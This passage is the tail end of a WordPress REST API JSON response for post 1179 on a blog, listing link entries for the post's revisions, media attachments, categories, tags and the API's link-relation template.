"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1179\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1179"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1179"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}